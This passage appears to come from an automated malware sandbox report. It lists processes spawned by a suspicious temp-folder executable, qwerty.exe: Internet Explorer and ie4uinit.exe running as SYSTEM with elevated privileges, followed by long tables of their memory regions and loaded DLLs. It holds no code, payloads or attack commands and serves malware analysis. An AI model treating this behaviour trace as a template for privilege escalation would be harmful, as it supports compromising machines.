private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #12: iexplore.exe
Information Value
ID #12
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:42
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x79c
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x64C
0x20C
0x4A4
0x41C
0x5C4
0x7FC
0x81C
0x82C
0x83C
0x860
0x86C
0x88C
0x920
0x48C
0x4A8
0x8E8
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
iexplore.exe.mui 0x00060000 0x00061fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x000d0000 0x000d0fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000100000 0x00100000 0x00101fff Pagefile Backed Memory Readable True False False -
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x001a0000 0x00245fff Memory Mapped File Readable, Writable, Executable False False False -
index.dat 0x00250000 0x0025bfff Memory Mapped File Readable, Writable True False False -
index.dat 0x00260000 0x00267fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00270000 0x0027ffff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable True False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000390000 0x00390000 0x00390fff Pagefile Backed Memory Readable True False False -
private_0x00000000003a0000 0x003a0000 0x003a0fff Private Memory Readable, Writable True False False -
private_0x00000000003b0000 0x003b0000 0x003b0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x004effff Private Memory Readable, Writable True False False -
locale.nls 0x004f0000 0x00556fff Memory Mapped File Readable False False False -
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006f0000 0x006f0000 0x006f0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000700000 0x00700000 0x00701fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000710000 0x00710000 0x00710fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000720000 0x00720000 0x00720fff Pagefile Backed Memory Readable True False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01cf0000 0x01fbefff Memory Mapped File Readable False False False -
private_0x0000000001fc0000 0x01fc0000 0x020bffff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002180000 0x02180000 0x021bffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0220ffff Private Memory Readable, Writable True False False -
private_0x0000000002210000 0x02210000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002260000 0x02260000 0x0229ffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x0230ffff Private Memory Readable, Writable True False False -
private_0x0000000002310000 0x02310000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x024affff Private Memory Readable, Writable True False False -
private_0x00000000024e0000 0x024e0000 0x025dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000025e0000 0x025e0000 0x026befff Pagefile Backed Memory Readable True False False -
private_0x0000000002610000 0x02610000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x00000000026e0000 0x026e0000 0x027dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000027e0000 0x027e0000 0x0284dfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000002850000 0x02850000 0x028acfff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000028f0000 0x028f0000 0x0292ffff Private Memory Readable, Writable True False False -
private_0x0000000002930000 0x02930000 0x0293ffff Private Memory Readable, Writable True False False -
private_0x0000000002940000 0x02940000 0x02a3ffff Private Memory Readable, Writable True False False -
private_0x0000000002a40000 0x02a40000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02b8ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002bd0000 0x02bd0000 0x02c0ffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02dcffff Private Memory Readable, Writable True False False -
private_0x0000000002e30000 0x02e30000 0x02f2ffff Private Memory Readable, Writable True False False -
private_0x0000000002f70000 0x02f70000 0x0306ffff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030c0000 0x030c0000 0x031bffff Private Memory Readable, Writable True False False -
private_0x0000000003200000 0x03200000 0x032fffff Private Memory Readable, Writable True False False -
private_0x0000000003300000 0x03300000 0x0330ffff Private Memory Readable, Writable True False False -
private_0x0000000003380000 0x03380000 0x0347ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000003480000 0x03480000 0x03872fff Pagefile Backed Memory Readable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x72e00000 0x7387ffff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73e90000 0x73ec2fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x74420000 0x74427fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74440000 0x74499fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x744a0000 0x744b2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74700000 0x74705fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74710000 0x7471cfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74720000 0x74771fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74a40000 0x74a54fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75210000 0x7528afff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 150 entries are omitted.
The remaining entries can be found in flog.txt.
Process #13: ie4uinit.exe
Information Value
ID #13
File Name c:\windows\syswow64\ie4uinit.exe
Command Line "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:38, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:42
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x244
Parent PID 0x79c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0x710, 0x32C, 0x144, 0x730, 0x80C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x00230000 0x0024ffff Memory Mapped File Readable True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x0037ffff Private Memory Readable, Writable True False False -
private_0x0000000000410000 0x00410000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x0062efff Pagefile Backed Memory Readable True False False -
private_0x0000000000650000 0x00650000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x00847fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000850000 0x00850000 0x009d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009e0000 0x009e0000 0x00d22fff Pagefile Backed Memory Readable True False False -
private_0x0000000000d30000 0x00d30000 0x00e2ffff Private Memory Readable, Writable True False False -
private_0x0000000000eb0000 0x00eb0000 0x00eeffff Private Memory Readable, Writable True False False -
ie4uinit.exe 0x00f30000 0x00f5dfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000f60000 0x00f60000 0x0235ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002360000 0x02360000 0x02752fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02760000 0x02a2efff Memory Mapped File Readable False False False -
private_0x0000000002a40000 0x02a40000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02b6ffff Private Memory Readable, Writable True False False -
oleacc.dll 0x73c10000 0x73c4bfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x73ea0000 0x73ea8fff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x73eb0000 0x73eb9fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x73ec0000 0x73ecafff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73ed0000 0x73ee8fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x73ef0000 0x73f5ffff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x73f60000 0x73f68fff Memory Mapped File Readable, Writable, Executable False False False -
advpack.dll 0x73f70000 0x73f9dfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74290000 0x74298fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x742f0000 0x743e4fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74ae0000 0x74b00fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x74c90000 0x74ca1fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75290000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75860000 0x75886fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #14: iexplore.exe
Information Value
ID #14
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1948 CREDAT:14337
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:39, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:41
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x49c
Parent PID 0x79c (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0xA00, 0x70C, 0x5F8, 0x6D0, 0xA14, 0x8F4, 0xA1C, 0x8F0, 0x8E4, 0xA24
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x0002ffff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe.mui 0x000e0000 0x000e1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00110000 0x00110fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00171fff Pagefile Backed Memory Readable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe 0x001a0000 0x00245fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x002e0000 0x002fffff Memory Mapped File Readable True False False -
private_0x0000000000300000 0x00300000 0x00301fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000350000 0x00350000 0x0042efff Pagefile Backed Memory Readable True False False -
private_0x0000000000430000 0x00430000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006c0000 0x006c0000 0x006c1fff Pagefile Backed Memory Readable True False False -
private_0x00000000006d0000 0x006d0000 0x0074ffff Private Memory Readable, Writable True False False -
